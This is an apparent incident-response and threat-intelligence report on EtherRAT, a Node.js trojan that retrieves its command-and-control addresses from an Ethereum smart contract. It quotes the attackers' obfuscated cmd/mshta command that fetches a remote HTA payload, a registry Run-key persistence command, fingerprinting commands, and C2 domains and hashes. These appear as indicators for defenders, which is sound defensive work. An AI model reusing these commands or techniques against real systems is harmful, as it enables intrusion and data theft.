During a recent incident investigation in the retail sector, a sophisticated malware strain known as EtherRAT was identified within a customer’s environment. This threat represents a growing trend in modern cyber operations, where attackers combine traditional backdoor capabilities with decentralized technologies like blockchain to improve resilience and evade detection.
EtherRAT is a Node.js-based remote access trojan (RAT) that allows adversaries to execute arbitrary commands, collect detailed system intelligence, and extract sensitive assets such as cryptocurrency wallets and cloud credentials. What makes this malware particularly notable is its use of a technique called EtherHiding, where command-and-control (C2) infrastructure is dynamically retrieved from Ethereum smart contracts. This significantly complicates takedown efforts and enables attackers to rotate infrastructure at minimal cost.
The activity also shows strong overlaps with previously documented campaigns, including similarities to the Tsundere botnet and tactics associated with North Korean APT operations.
Initial Access and Entry Techniques
In this case, the attackers gained entry through a method known as ClickFix, although other campaigns frequently rely on IT support scams delivered via Microsoft Teams and QuickAssist.
The ClickFix chain used an indirect execution method involving legitimate Windows binaries. Specifically, the attacker leveraged pcalua.exe to execute mshta.exe, which then downloaded a malicious HTA file.
Obfuscated Command Observed
"C:\Windows\system32\cmd.exe" /min /c "p^c^a^l^u^a^.^e^x^e ^-a ^m^s^h^t^a^.^e^x^e ^-c ^h^t^t^p^s^:^/^/w^w^w^-^f^l^o^w^-^s^u^b^m^i^s^s^i^o^n^-^m^a^n^a^g^e^m^e^n^t^.^s^h^e^p^h^e^r^d^s^e^s^t^a^t^e^s^.^u^k^/^s^h^e^p^.^h^t^a^"
Deobfuscated Version
"C:\Windows\system32\cmd.exe" /min /c "pcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.hta"
This approach allowed the attackers to bypass standard command-line restrictions while blending in with legitimate system activity.
Attack Chain Breakdown
Stage 1: Loader Execution
The first stage consists of a lightweight Node.js script that decrypts a secondary payload using AES-256-CBC. The encrypted content is stored in:
aeJ8aMT9ogQtKEb.dat
The script then executes the decrypted payload directly in memory using Node.js internal compilation functions, avoiding disk-based detection.
Stage 2: Payload Deployment and Persistence
The second stage is heavily obfuscated (likely using Obfuscator.io) and performs two key actions:
- Decrypts the main EtherRAT payload
- Establishes persistence via Windows Registry
The encrypted payload is stored as: 2htgIPQLUYA3aWq.cfg
After decryption, it is written to disk as: TLHA1IlxoF.bin
Execution is performed using: child_process.spawn()
Persistence is achieved by creating a registry key under: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
The attackers cleverly use conhost.exe with a hidden Node.js process to maintain stealth.
Stage 3: EtherRAT Core Functionality
At its core, EtherRAT acts as a fully functional backdoor. It communicates with remote infrastructure, executes attacker commands, and continuously polls for instructions.
The malware is highly obfuscated and dynamically resolves its strings at runtime, making static analysis difficult.
Command-and-Control via Blockchain (EtherHiding)
One of the most advanced aspects of this malware is its use of blockchain technology.
Instead of hardcoding C2 servers, EtherRAT retrieves them from an Ethereum smart contract:
0xe26c57b7fa8de030238b0a71b3d063397ac127d3
By querying multiple public RPC providers, the malware determines the most commonly returned C2 address.
RPC Providers Used
https://eth.llamarpc.com
https://mainnet.gateway.tenderly.co
https://rpc.flashbots.net/fast
https://rpc.mevblocker.io
https://eth-mainnet.public.blastapi.io
https://ethereum-rpc.publicnode.com
https://rpc.payload.de
https://eth.drpc.org
https://eth.merkle.io
This decentralized approach ensures that even if one infrastructure node is taken down, others remain accessible.
C2 Communication Pattern
Once the C2 address is retrieved, the malware constructs requests that mimic legitimate CDN traffic.
Example URL Pattern
<C2>/api/<random_hex>/<uuid>/<random_file>.<ext>?<param>=<id>
Observed Example
hxxps://aurineuroth[.]com/api/5f459179/29e96c95-62a5-49e5-a8ba-7ebfbf560ab7/b435a6b1.ico?b=9e2f9c07-f85a-4089-8669-186f56bca7b3
This design helps the malware blend into normal web traffic, making detection significantly harder.
System Fingerprinting (SYS_INFO Module)
After establishing communication, EtherRAT deploys an additional module referred to as SYS_INFO, which performs deep system reconnaissance.
Key Data Collected
- Public IP address
- CPU and GPU details
- Username and hostname
- Operating system and architecture
- Installed antivirus solutions
- Domain membership
- RAM and uptime
- MAC address
- Machine GUID
Before collecting data, the malware checks for CIS-region languages (e.g., Russian, Kazakh). If detected, it terminates itself, likely to avoid targeting certain regions.
Self-Modification and Reobfuscation
Another advanced feature is the malware’s ability to rewrite itself.
It sends its source code to the C2 server, receives a newly obfuscated version, overwrites itself, and restarts. This makes signature-based detection extremely unreliable over time.
Incident Response Actions
The SOC team took immediate containment actions:
- Isolated the infected host
- Prevented lateral movement
- Initiated monitoring across endpoints, logs, and network telemetry
- Assisted the customer with remediation
Security Recommendations
Organizations should take the following steps to reduce risk:
- Disable
mshta.exeandpcalua.exevia application control policies - Restrict access to Run dialog through Group Policy
- Conduct phishing and social engineering awareness training
- Block access to known crypto RPC endpoints
- Deploy EDR or MDR solutions for continuous monitoring
Indicators of Compromise (IOCs)
| Type | Value | Description |
| Command Line | C:\Windows\system32\cmd.exe /c where curl.exe 2>nul | Uses LOLBin where.exe to determine the path of curl.exe (CURL) |
| Command Line | “C:\Windows\System32\curl.exe” -s -L -o “C:\Users\<USERNAME>\AppData\Local\Temp\QE35OO5mUa.zip” “https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip” | Download node version 18.17.0 portable via CURL |
| Command Line | ta””r -xf “C:\Users\<USERNAME>\AppData\Local\Temp\QE35OO5mUa.zip” -C “C:\Users\<USERNAME>\AppData\Local\VZM5DH” | Unzip node via obfuscated ‘ta””r’ command |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “0c939bf7ae8f” /t REG_SZ /d “conhost.exe –headless “C:\Users\<USERNAME>\AppData\Local\VZM5DH\xgYbxq\node.exe” “C:\Users\<USERNAME>\AppData\Local\VZM5DH\TlHAiIlxoF.bin”” /f” | Persistence via LOLBin reg.exe with headless conhost for EtherRAT payload |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “[System.Globalization.CultureInfo]::InstalledUICulture.Name”” | Fingerprinting by getting the victim host’s language |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_VideoController).Name -join ‘, ‘”” | Fingerprinting by getting the name of the victim machine’s GPU |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “try { (Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct -EA Stop).displayName -join ‘, ‘ } catch { ‘none’ }”” | Get installed AntiVirus information from the victim machine |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).Domain”” | Get the Active Directory (AD) domain the victim machine is joined to |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “(Get-WmiObject Win32_ComputerSystem).PartOfDomain”” | Check if the victim machine is part of an AD domain (potentially indicating it could be of high value) |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “reg query “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v ProductName” | Fingerprinting victim OS name |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “net session” | Discovery command to list session information |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “powershell -NoProfile -NonInteractive -WindowStyle Hidden -Command “Get-WmiObject Win32_LogicalDisk | Select-Object DeviceID,VolumeName,Size,FreeSpace,DriveType | ConvertTo-Json”” | Discovery command to list information about drives, output as JSON |
| Command Line | C:\Windows\system32\cmd.exe /d /s /c “net use” | Discovery command used in listing network resources, e.g. shared directories |
| URL | https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip | Node.js download URL |
| Domain | jariosos.com | EtherRAT C2 |
| Domain | hayesmed.com | EtherRAT C2 |
| Domain | regancontrols.com | EtherRAT C2 |
| Domain | salinasrent.com | EtherRAT C2 |
| Domain | justtalken.com | EtherRAT C2 |
| Domain | mebeliotmasiv.com | EtherRAT C2 |
| Domain | euclidrent.com | EtherRAT C2 |
| Domain | o-parana.com | EtherRAT C2 |
| Domain | palshona.com | EtherRAT C2 |
| Domain | aurineuroth.com | EtherRAT C2 |
| IP | 185.218.19.162 | EtherRAT C2 |
| Command Line (Linux) | lspci 2>/dev/null | grep -i vga | cut -d: -f3 | Get GPU name on Linux |
| Command Line (Linux) | glxinfo 2>/dev/null | grep “OpenGL renderer” | cut -d: -f2 | Get GPU name on Linux (fallback) |
| Command Line (Linux/macOS) | ps aux 2>/dev/null | List running processes to identify installed AntiVirus |
| Command Line (Linux/macOS) | hostname -d 2>/dev/null || dnsdomainname 2>/dev/null || echo “local” | Get the victim domain |
| Command Line (Linux) | lsb_release -d 2>/dev/null | cut -f2 | Get victim machine OS information |
| Command Line (macOS) | sw_vers -productName && sw_vers -productVersion | Get victim machine OS information |
| File | 2edf1ab615b489e228a89c617d24f66d1e780a6d5e30f6886608dfe79325acf8 | EtherRAT HTA script “shep.hta” |
| File | 294c597c89023093e1e175949f5104f887b89cd8e1cf1d3192ee9032739f259e | EtherRAT MSI loader |
| File | 5623f4f8942872b2b7cb6d2674c126a42bdf6ed5d1f37c1afc348529e4697d73 | EtherRAT stage 1 |
| File | b1ee812e7c786c8696f913595658e57706d97a66ca7b7634f421f5c552e7002b | EtherRAT stage 2 (deobfuscated) |
| File | 47f74749cfcd55c8dacde2cc9b4c45282bec7a93ee19b7b81b452c99758d3370 | EtherRAT stage 2 (obfuscated) |
| File | 03c4e54cc775ab819752dc5d420ab2fed03bd445c3ce398d021031100b334fb4 | EtherRAT (deobfuscated) |
| File | 7dd1bf7a58774a081062f5c8f183d24f95c433805e0bf73280c0adba1c71390d | EtherRAT (obfuscated) |
| File | 83b1f11c6a0bd267e415136440559131d2d4ace9a65dc221ea3b144fe0e7199b | EtherRAT SYS_INFO module |
| Domain | www-flow-submission-management.shepherdsestates.uk | Compromised website serving HTA/MSI |
Our Analysis and Opinion
From our perspective, this case clearly shows how modern malware is evolving beyond traditional infrastructure and moving into decentralized ecosystems. The use of Ethereum smart contracts for C2 retrieval is not just a technical novelty—it represents a strategic shift. Attackers are deliberately choosing platforms that are inherently resistant to takedown, making defensive efforts more complex and resource-intensive.
What stands out most is how well EtherRAT blends multiple techniques. It combines social engineering (ClickFix and IT support scams), living-off-the-land binaries (LOLBins), strong encryption, and blockchain-based infrastructure. Individually, these techniques are not new. However, the way they are integrated into a single attack chain demonstrates a high level of operational maturity.
Another important observation is the malware’s adaptability. Features like self-reobfuscation and dynamic C2 updates mean that traditional detection methods—especially static signatures—are becoming less effective. Security teams can no longer rely only on known indicators; behavioral detection and threat hunting are now essential.
The CIS language check also suggests deliberate targeting. This is not opportunistic malware spreading randomly—it is designed to avoid specific regions, which is often seen in state-linked operations. This further supports the idea that EtherRAT is part of a broader, organized campaign rather than isolated criminal activity.
From a defensive standpoint, organizations need to rethink visibility. Encrypted traffic over TLS 1.3, CDN-like communication patterns, and blockchain-based configuration channels all reduce the effectiveness of perimeter-based controls. Detection must move closer to the endpoint, where behavior can be monitored in real time.
In conclusion, EtherRAT is a strong example of how threat actors are innovating faster than traditional defenses. It highlights the urgent need for layered security, continuous monitoring, and user awareness. Organizations that fail to adapt to these changes will find it increasingly difficult to detect and respond to such threats in time.
